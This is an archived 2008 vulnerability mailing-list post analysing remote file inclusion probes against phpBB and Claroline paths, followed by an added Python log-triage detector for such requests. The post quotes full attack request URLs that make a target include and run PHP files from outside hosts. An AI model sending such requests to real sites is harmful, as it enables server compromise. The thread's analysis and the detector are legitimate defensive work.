[VIM] RFI BotNet and phpBB 0-day?
security curmudgeon
jericho at attrition.org
Thu Mar 20 19:34:26 UTC 2008
: Dunno if it's a botnet but given Gadi's paper from last year on web
: server compromises, it's a really good theory.
I say that based on a few things I've seen, and I bet a real analysis
would very quickly prove or disprove the theory.
: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
:
: I looked at the 2.0.23 source.
:
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work. So, this is probably Claroline.
Well, don't base it just on that path. I see a LOT of obvious path request
screwups:
/pipermail/vim/2006-October/001080.html//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://xdengue01.iespana.es/bds/sefe.txt??
I see these a hundred times a day and they obviously will not work. So seeing
/claroline/ in front of the /phpbb/ request was odd, but I didn't take it
to mean it was necessarily claroline, even though it may be.
: ./claroline155/claroline/phpbb/page_tail.php
:
: But - no apparent luck:
:
: @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");
:
: and no mention of includePath in that file.
:
: claro_init_footer.inc.php seems clean.
:
: Similar for 1.64.
:
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: bug.
:
: 1.42 ZIP file seems corrupted, so I couldn't check it out.
From George:
Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5
back in 2006:
http://claroline.svn.sourceforge.net/viewvc/claroline?view=rev&revision=6566
http://claroline.svn.sourceforge.net/viewvc/claroline/branches/1.5/README.txt?revision=6567&view=markup
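An added example, not part of the original post: a log-triage sketch that flags requests shaped like the ones quoted in this thread (a query parameter carrying a remote URL, trailing `?` padding, a request glued onto another page's path) and groups client IPs by payload host. The log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (combined format); hosts and paths are made up.
SAMPLE_LOG = '''\
203.0.113.5 - - [20/Mar/2008:19:01:02 +0000] "GET /claroline/phpbb/page_tail.php?includePath=http://files.example.invalid/id2.txt%3f%3f HTTP/1.1" 404 210
203.0.113.9 - - [20/Mar/2008:19:02:10 +0000] "GET /archive/2006-October/001080.html//poll/comments.php?ddd=http://files.example.invalid/s.txt?? HTTP/1.1" 404 210
198.51.100.7 - - [20/Mar/2008:19:03:44 +0000] "GET /redirect.php?next=/index.php&ref=news HTTP/1.1" 200 5120
'''

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE = re.compile(r'^(?:https?|ftp)://([^/?#]+)', re.I)

def scan(log_text):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        uri, status = m.group(1), int(m.group(2))
        path, _, query = uri.partition('?')
        # parse_qsl percent-decodes values, so %3f and a raw '?' look the same
        for name, value in parse_qsl(query, keep_blank_values=True):
            remote = REMOTE.match(value)
            if not remote:
                continue
            findings.append({
                'client': line.split(' ', 1)[0],
                'script': path.rsplit('/', 1)[-1],
                'param': name,
                'remote_host': remote.group(1).lower(),
                # trailing '?' (raw or %3f) is the padding seen on these probes
                'padded': value.endswith('?'),
                # '//' inside the path: request appended to another page's URL
                'mangled_path': '//' in path,
                'status': status,
            })
    return findings

def clients_per_host(findings):
    """Map each remote payload host to the set of client IPs that requested it."""
    out = {}
    for f in findings:
        out.setdefault(f['remote_host'], set()).add(f['client'])
    return out
```

Many distinct clients requesting the same payload host is the kind of evidence the "real analysis" mentioned above would look for.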